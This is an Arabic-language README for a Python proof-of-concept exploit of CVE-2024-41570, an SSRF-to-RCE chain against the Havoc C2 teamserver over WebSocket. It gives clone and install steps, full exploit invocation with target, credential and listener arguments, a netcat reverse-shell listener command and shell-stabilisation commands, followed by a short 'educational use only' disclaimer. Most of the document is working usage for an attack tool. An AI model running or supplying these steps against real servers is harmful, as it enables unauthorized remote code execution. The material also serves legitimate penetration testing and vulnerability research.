
استغلال الصدفة العكسية الآلي عبر WebSocket | Havoc-C2-SSRF مع RCE
يوفر هذا المشروع نصًا برمجيًا لإثبات المفهوم (PoC) مبنيًا على Python لاستغلال خدمة قائمة على WebSocket ضعيفة. يقوم البرنامج النصي بأتمتة تسجيل الوكيل، توصيل حمولة WebSocket، وتنفيذ الأوامر عن بُعد لإنشاء شل عكسي.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
شغل البرنامج النصي مع الوسائط المطلوبة:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: عنوان URL الهدف لخادم WebSocket.-i: عنوان IP لخادم الفريق من Havoc.-p: المنفذ لخادم الفريق من Havoc.-U: اسم المستخدم لمصادقة WebSocket.-P: كلمة المرور لمصادقة WebSocket.-l: عنوان IP للمستمع للشل العكسي (جهازك).-L: منفذ المستمع للشل العكسي (جهازك).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
يتطلب البرنامج النصي مكتبات Python التالية:
requestspycryptodomeقم بتثبيتها باستخدام الأمر:
pip install -r requirements.txt
هذا البرنامج النصي مخصص للأغراض التعليمية فقط. تأكد من حصولك على إذن صريح لاختبار النظام المستهدف. قد يؤدي سوء استخدام هذا البرنامج النصي إلى انتهاك القوانين والمبادئ التوجيهية الأخلاقية.
مستوحى من Default Havoc Poc
المساهمات مرحب بها! لا تتردد في عمل Fork للمستودع وتقديم طلب سحب.
هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.